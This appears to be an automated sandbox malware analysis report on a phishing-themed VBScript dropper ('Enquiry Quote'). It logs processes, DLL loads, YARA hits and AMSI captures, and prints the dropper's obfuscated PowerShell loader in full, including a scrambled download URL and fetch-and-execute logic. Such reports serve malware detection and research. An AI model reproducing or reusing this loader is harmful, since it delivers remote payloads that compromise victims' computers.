Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAC06C2A2	15_2_00007FFAAC06C2A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAC13088D	15_2_00007FFAAC13088D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A8F1F0	19_2_04A8F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A8FAC0	19_2_04A8FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A8EEA8	19_2_04A8EEA8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Enquiry Quote - 24071834-01.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_3024.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@9/8@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Woes.uds

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3024

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 00000013.00000002.2567702655.0000000009DB3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2567559021.0000000008B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2550702407.0000000005ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Phoronidea $Jailor $brochureblade), (Ketil234 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Translokationernes = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Appellanter)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skyttekdens, $false).DefineType($Sidelbende,
